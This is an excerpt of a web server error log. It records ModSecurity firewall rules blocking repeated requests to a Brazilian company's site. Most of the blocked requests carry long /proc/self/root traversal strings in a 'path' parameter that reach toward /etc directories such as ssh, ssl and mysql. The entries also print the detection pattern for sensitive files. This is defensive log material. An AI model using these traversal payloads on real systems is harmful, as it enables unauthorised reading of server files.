[Mon Mar 16 17:13:49.374127 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.243.203:33136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkfc_BxrYCr4hPDw8AagAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:54.390255 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:49322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkgrysWC90G-1nBrBaQAAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:55.193079 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.243.203:34202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkg6QpVkWug9HeOt9L9QAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:13:57.804182 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:55016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkhaTCbgAP5jq5TehDIgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:14:01.939562 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:34218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkiaQpVkWug9HeOt9MAQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:14:07.651728 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:34104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkj0r9dMAiw-8KANNd4AAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:14:09.013519 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:41754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkkUr9dMAiw-8KANNd4gAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:14:14.409590 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:41760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhklv9ocpUE4ed4uDwJAwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:14:16.924798 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:41766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkmLysWC90G-1nBrBaUQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:14:21.579810 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:51238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhknbysWC90G-1nBrBaXAAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:14:46.107735 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:51252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkttSswJuvopo3lOh1igAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:14:53.823139 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.244.31:48362] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhkvVajLEzk2WiQ-10o8AAAAoM"]
[Mon Mar 16 17:15:57.031577 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:36378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhk_dSswJuvopo3lOh1ygAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:16:04.070719 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:41418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlBP9ocpUE4ed4uDwJHwAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:16:06.655215 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:41426] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlBc_BxrYCr4hPDw8AjwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:16:12.011168 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:41438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlDKQpVkWug9HeOt9MJAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:16:32.688651 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.243.203:55852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlIEr9dMAiw-8KANNeOAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:16:37.401659 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:54248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlJNSswJuvopo3lOh10wAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:16:38.797670 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:54260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlJqQpVkWug9HeOt9MLAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:16:43.395444 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:54274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlK9SswJuvopo3lOh11gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:16:59.867771 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:43614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlO_9ocpUE4ed4uDwJQwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:17:03.602458 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:34400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlP9SswJuvopo3lOh2AgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:17:04.970451 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:34412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 